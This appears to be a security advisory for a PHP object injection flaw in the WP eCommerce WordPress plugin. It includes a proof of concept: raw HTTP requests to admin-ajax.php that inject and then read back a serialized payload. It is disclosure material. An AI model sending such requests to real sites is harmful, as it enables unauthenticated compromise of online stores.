WP eCommerce <= 3.15.1 – Unauthenticated PHP Object Injection | CVE 2026-1235

Description

The plugin unserializes user input via ajax actions, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

Proof of Concept

Request 1 - Inject Malicious Serialized Payload

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: wpsc_customer_cookie_c3633525c9b1c485d76a49eb7443de97=16%7C1767978411%7C5f7d896eba3ac22a871c71bb5051acca
Content-Length: 143

action=wpsc_update_customer_meta&meta_key=_wpsc_cart.cart_items&meta_value=YToyOntzOjU6InB3bmVkIjtzOjQ6InRydWUiO3M6NjoicmVhc29uIjtzOjEyOiJQT0lfdmVyaWZpZWQiO30=
```
Response:

```
HTTP/1.1 200 OK
Date: Wed, 07 Jan 2026 17:06:50 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33
Content-Type: application/json; charset=UTF-8

{"success":true,"data":{"request":{"action":"wpsc_update_customer_meta","meta_key":"_wpsc_cart.cart_items","meta_value":"YToyOntzOjU6InB3bmVkIjtzOjQ6InRydWUiO3M6NjoicmVhc29uIjtzOjEyOiJQT0lfdmVyaWZpZWQiO30="},"type":"error","error":"meta values may not have been updated"}}
```

Request 2 - Verify Payload Persistence (Same Cookie!)

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: wpsc_customer_cookie_c3633525c9b1c485d76a49eb7443de97=16%7C1767978411%7C5f7d896eba3ac22a871c71bb5051acca
Content-Length: 56

action=wpsc_get_customer_meta&meta=_wpsc_cart.cart_items
```

Response:

```
HTTP/1.1 200 OK
Date: Wed, 07 Jan 2026 17:08:28 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33
Content-Type: application/json; charset=UTF-8

{"success":true,"data":{"request":{"action":"wpsc_get_customer_meta","meta":"_wpsc_cart.cart_items"},"customer_meta":{"_wpsc_cart.cart_items":"YToyOntzOjU6InB3bmVkIjtzOjQ6InRydWUiO3M6NjoicmVhc29uIjtzOjEyOiJQT0lfdmVyaWZpZWQiO30="},"type":"success","error":""}}
```